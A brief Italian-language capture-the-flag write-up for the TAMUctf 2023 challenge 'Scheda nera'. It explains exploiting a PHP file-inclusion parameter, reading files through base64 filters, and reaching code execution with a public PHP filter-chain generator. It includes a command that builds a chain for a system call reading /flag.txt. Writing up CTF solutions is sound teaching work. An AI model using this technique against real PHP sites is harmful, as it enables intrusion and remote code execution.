TAMUctf 2023- Scheda nera

May 01 2023
Questa sfida è stata creata da Mr. Blade Possiamo vedere che carica la pagina di accesso con il parametro della pagina.

Questa sfida è stata creata da Mr. Blade

Possiamo vedere che carica la pagina di accesso con il parametro della pagina .

Enumeriamo i file. Ho provato prima l'amministratore e ho utilizzato i codificatori base64.

Quando decodifichiamo questo possiamo ottenere il percorso per flag.txt

<center>
<h1><?php include('/flag.txt'); ?></h1>
</center>

sto usandohttps://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py
per ottenere RCE.

python3 filter_chain.py — chain ‘<?php system(“cat /flag.txt”);?>’ | grep ‘^php*’ | xclip -selection clipboard

Grazie per aver letto.

Buon Hacking!